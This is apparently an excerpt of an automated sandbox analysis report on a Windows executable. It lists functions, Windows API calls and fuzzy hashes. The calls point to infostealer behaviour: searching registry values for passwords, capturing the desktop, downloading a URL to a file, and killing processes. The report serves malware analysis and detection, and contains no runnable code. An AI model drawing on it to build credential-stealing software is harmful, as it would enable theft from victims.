                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045C932
                        • StrCmpCA.SHLWAPI(00000000,00474C3C), ref: 0045C943
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID:
                        • API String ID: 367037083-0
                        • Opcode ID: 5479565f607ed45e07648aea450f0514f278b3edd9d63c5aaff2f164c1d01972
                        • Instruction ID: 9500855d9f5a2fffd65e034ff705bad297b3e73808bb4ca03a03c5336363ccce
                        • Opcode Fuzzy Hash: 5479565f607ed45e07648aea450f0514f278b3edd9d63c5aaff2f164c1d01972
                        • Instruction Fuzzy Hash: 5161B171A103159FDB11EFB58884AAFBBF9AF09345F00002AEC45E7342D77C8D098BA9
                        Function 00464500 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 95memoryCOMMON
                        Download Yara Rule
                        APIs
                        • memset.MSVCRT ref: 0046451A
                        • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00454F39), ref: 00464545
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0046454C
                        • wsprintfW.USER32 ref: 0046455B
                        • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 004645CA
                        • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 004645D9
                        • CloseHandle.KERNEL32(00000000,?,?), ref: 004645E0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                        • String ID: 9OE$%hs$9OE
                        • API String ID: 3729781310-4137692398
                        • Opcode ID: 397c6a43e9a5b8d50fe583ceb057a00ec95071c39e56876f3b4072cabe2e5c1e
                        • Instruction ID: 65a8ef1d2906933e6a24ccdeadcba3431d55365a6a1f6e15e1e519cf5adba6b0
                        • Opcode Fuzzy Hash: 397c6a43e9a5b8d50fe583ceb057a00ec95071c39e56876f3b4072cabe2e5c1e
                        • Instruction Fuzzy Hash: F4317371A40205BBDB14DBE4DC49FDE77B9FF45700F10405AFA0AE7180EB746A818BAA
                        Function 004641E0 Relevance: 16.7, APIs: 11, Instructions: 177COMMON
                        Download Yara Rule
                        APIs
                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00460CF0), ref: 00464276
                        • GetDesktopWindow.USER32 ref: 00464280
                        • GetWindowRect.USER32(00000000,?), ref: 0046428D
                        • SelectObject.GDI32(00000000,00000000), ref: 004642BF
                        • GetHGlobalFromStream.COMBASE(00460CF0,?), ref: 00464336
                        • GlobalLock.KERNEL32(?), ref: 00464340
                        • GlobalSize.KERNEL32(?), ref: 0046434D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                        • String ID:
                        • API String ID: 1264946473-0
                        • Opcode ID: b431bf5269754c488dacd9f1645862f7befb367be5f582db787701f91c977c26
                        • Instruction ID: 696550df4250bc592f95730e4e1a77229c27e1866da20d4929077e78680fb5bb
                        • Opcode Fuzzy Hash: b431bf5269754c488dacd9f1645862f7befb367be5f582db787701f91c977c26
                        • Instruction Fuzzy Hash: FE514E75A10208AFDB14EFA4DD89AEEB7B9EF48304F10501AF905E3250DB78AD41CBA5
                        Function 0045DFA0 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcat.KERNEL32(?,0158E508), ref: 0045E00D
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0045E037
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045E06F
                        • lstrcat.KERNEL32(?,00000000), ref: 0045E07D
                        • lstrcat.KERNEL32(?,?), ref: 0045E098
                        • lstrcat.KERNEL32(?,?), ref: 0045E0AC
                        • lstrcat.KERNEL32(?,0157B6D0), ref: 0045E0C0
                        • lstrcat.KERNEL32(?,?), ref: 0045E0D4
                        • lstrcat.KERNEL32(?,0158DA90), ref: 0045E0E7
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045E11F
                        • GetFileAttributesA.KERNEL32(00000000), ref: 0045E126
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                        • String ID:
                        • API String ID: 4230089145-0
                        • Opcode ID: 1b6982f7f8a099eb10479d3371e1679ca1f122cf0be311b1664520e67925837b
                        • Instruction ID: e3d84b2a99bfd65dde5b86f6b4cb51968091be11be95f73a044cde1424513a77
                        • Opcode Fuzzy Hash: 1b6982f7f8a099eb10479d3371e1679ca1f122cf0be311b1664520e67925837b
                        • Instruction Fuzzy Hash: D261BF71A1011CEBDB19DB64CD44ADEB3B5BF48300F5049AABA09A3351DB749F858FA4
                        Function 00446AD0 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 00446AFF
                        • InternetOpenA.WININET(0046CFEC,00000001,00000000,00000000,00000000), ref: 00446B2C
                        • StrCmpCA.SHLWAPI(?,0158EAA8), ref: 00446B4A
                        • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00446B6A
                        • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00446B88
                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00446BA1
                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00446BC6
                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00446BF0
                        • CloseHandle.KERNEL32(00000000), ref: 00446C10
                        • InternetCloseHandle.WININET(00000000), ref: 00446C17
                        • InternetCloseHandle.WININET(?), ref: 00446C21
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                        • String ID:
                        • API String ID: 2500263513-0
                        • Opcode ID: c6c473d14e280d03a72ba60acf176d69d4b53a5d5b68c1913a7a41a0665df1df
                        • Instruction ID: 8d7672dfc6f470112ccf7df771ba97bc86671a8eff4a9721d30345e3d9f14f32
                        • Opcode Fuzzy Hash: c6c473d14e280d03a72ba60acf176d69d4b53a5d5b68c1913a7a41a0665df1df
                        • Instruction Fuzzy Hash: 3E41B471640215AFEB24DF64DC49FAF77B9EB44704F004459FA09E7280DF74AE408BA9
                        Function 0044BBF9 Relevance: 15.2, APIs: 12, Instructions: 249stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044BC1F
                        • lstrlen.KERNEL32(00000000), ref: 0044BC52
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044BC7C
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044BC84
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044BCAC
                        • lstrlen.KERNEL32(00474AD4), ref: 0044BD23
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat
                        • String ID:
                        • API String ID: 2500673778-0
                        • Opcode ID: 06573db99fa04b5e786c38e68d2f44c26474462c9a3ce0f6bddb168c5f89c6da
                        • Instruction ID: 2a03d1ea9019f5f06bc1471757ff4be602a07881b4db3f422aa449cff5afa77e
                        • Opcode Fuzzy Hash: 06573db99fa04b5e786c38e68d2f44c26474462c9a3ce0f6bddb168c5f89c6da
                        • Instruction Fuzzy Hash: A6A17170A002058FEB25DF25D989AAEB7F1EF44309F54846EF80997361DB79DC41CB98
                        Function 00465EE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 215COMMON
                        Download Yara Rule
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00465F2A
                        • std::_Xinvalid_argument.LIBCPMT ref: 00465F49
                        • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00466014
                        • memmove.MSVCRT(00000000,00000000,?), ref: 0046609F
                        • std::_Xinvalid_argument.LIBCPMT ref: 004660D0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xinvalid_argumentstd::_$memmove
                        • String ID: invalid string position$string too long
                        • API String ID: 1975243496-4289949731
                        • Opcode ID: 53a76e9df8eeeb0ccf76126f6e897b034f97c74fb5582151fe3c89add0a05a1c
                        • Instruction ID: 1fc2d3a47929b230c1d603a87bec73dc85cc303799d20e40c2bb6323e1f80d29
                        • Opcode Fuzzy Hash: 53a76e9df8eeeb0ccf76126f6e897b034f97c74fb5582151fe3c89add0a05a1c
                        • Instruction Fuzzy Hash: C8618F70700604DBDB18CF5CC99496EB7B6EF85304B244A2AE592C7781E739ED818B9F
                        Function 0045E049 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045E06F
                        • lstrcat.KERNEL32(?,00000000), ref: 0045E07D
                        • lstrcat.KERNEL32(?,?), ref: 0045E098
                        • lstrcat.KERNEL32(?,?), ref: 0045E0AC
                        • lstrcat.KERNEL32(?,0157B6D0), ref: 0045E0C0
                        • lstrcat.KERNEL32(?,?), ref: 0045E0D4
                        • lstrcat.KERNEL32(?,0158DA90), ref: 0045E0E7
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045E11F
                        • GetFileAttributesA.KERNEL32(00000000), ref: 0045E126
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$AttributesFile
                        • String ID:
                        • API String ID: 3428472996-0
                        • Opcode ID: 47d126707365b1da53a11777e068a1fbe7aa1c329713dbc617ea7a60b1138200
                        • Instruction ID: b8ab921e04006716fbc2a157d6bca77d1ee8fd9e12bbf374179749e690becd0f
                        • Opcode Fuzzy Hash: 47d126707365b1da53a11777e068a1fbe7aa1c329713dbc617ea7a60b1138200
                        • Instruction Fuzzy Hash: 6341C37191011C9BCB29EB64DD48ADEB3B5BF48300F5049AAF909A3351DB789F858FA4
                        Function 00447A60 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 109stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 004477D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00447805
                          • Part of subcall function 004477D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0044784A
                          • Part of subcall function 004477D0: StrStrA.SHLWAPI(?,Password), ref: 004478B8
                          • Part of subcall function 004477D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004478EC
                          • Part of subcall function 004477D0: HeapFree.KERNEL32(00000000), ref: 004478F3
                        • lstrcat.KERNEL32(00000000,00474AD4), ref: 00447A90
                        • lstrcat.KERNEL32(00000000,?), ref: 00447ABD
                        • lstrcat.KERNEL32(00000000, : ), ref: 00447ACF
                        • lstrcat.KERNEL32(00000000,?), ref: 00447AF0
                        • wsprintfA.USER32 ref: 00447B10
                        • lstrcpy.KERNEL32(00000000,?), ref: 00447B39
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00447B47
                        • lstrcat.KERNEL32(00000000,00474AD4), ref: 00447B60
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                        • String ID: :
                        • API String ID: 398153587-3653984579
                        • Opcode ID: 54bd5aca9aa6b036ef0ff4b517f022bc16d28f09ebee4d60867399473f811f64
                        • Instruction ID: c79adc6e9dba4224ebfc4f0a9c0371bfebee25126ef9cb94c82f562f20ce1d7a
                        • Opcode Fuzzy Hash: 54bd5aca9aa6b036ef0ff4b517f022bc16d28f09ebee4d60867399473f811f64
                        • Instruction Fuzzy Hash: 2B31C972A50214EFDB14DB64DC489AFB7BAEB84714B14451EE60D93300DB78ED42CB64
                        Function 004581B0 Relevance: 12.7, APIs: 10, Instructions: 175stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(00000000), ref: 0045820C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00458243
                        • lstrlen.KERNEL32(00000000), ref: 00458260
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00458297
                        • lstrlen.KERNEL32(00000000), ref: 004582B4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004582EB
                        • lstrlen.KERNEL32(00000000), ref: 00458308
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00458337
                        • lstrlen.KERNEL32(00000000), ref: 00458351
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00458380
